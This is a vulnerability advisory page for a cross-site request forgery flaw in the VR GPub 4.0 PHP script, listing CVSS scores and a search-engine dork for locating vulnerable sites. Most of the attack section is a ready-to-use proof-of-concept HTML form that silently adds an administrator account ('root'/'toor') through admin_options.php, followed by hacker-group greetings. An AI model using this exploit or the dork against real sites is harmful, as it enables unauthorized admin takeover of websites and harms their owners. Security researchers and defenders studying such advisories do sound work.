VR GPub 4.0 Cross Site Request Forgery

2012-01-27 / 2012-09-20
Credit: Cyber-Crystal
Risk: Low
Local: No
Remote: Yes
CWE: CWE-352


CVSS Base Score: 6.8/10
Impact Subscore: 6.4/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

+-------------------------------------------------------------------------+ # Exploit Title : VR GPub 4.0 CSRF Vulnerability # version : VR GPub 4.0 # Author : Cyber-Crystal # Date : n/a # Dork : inurl:"VR GPub" # Software Link : http://www.easy-script.com/scripts-PHP/vr-gpub-3907.html +-------------------------------------------------------------------------+ +---+[CSRF Add Admin Acuonnt by Cyber-Crystal]+---+ <html> <title>[#] Exploit [#]</title> <body> <form method="post" action="http://localhost/vrgpub/admin/admin_options.php"> <input name="ae_login" type="text" id="ae_login" size="20" maxlength="30" value="root" /> <input name="ae_mdp" type="password" id="ae_mdp" size="20" maxlength="30" value="toor" /> <input name="ae_mdp2" type="password" id="ae_mdp2" size="20" maxlength="30" value="toor" /> <p align="center"> <input type="submit" name="Submit4" value="Add" /> </p> </form> </body> </html> #-----------------------------------# | by Cyber-Crystal | | | | Mail : Cyb3r.Crystal@Gmail.com | | Home // www.v4-team.com/cc | | | #-----------------------------------# Greetz 2 : Secure-x41 | Fox Hacker | Or4nG.M4n | SadHacker | Mr.Black | Red Virus | aBu.HaLiL501 | T7 | Sniper_IRaq || # All Man 0_0 # the End

References:

http://www.easy-script.com/scripts-PHP/vr-gpub-3907.html


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top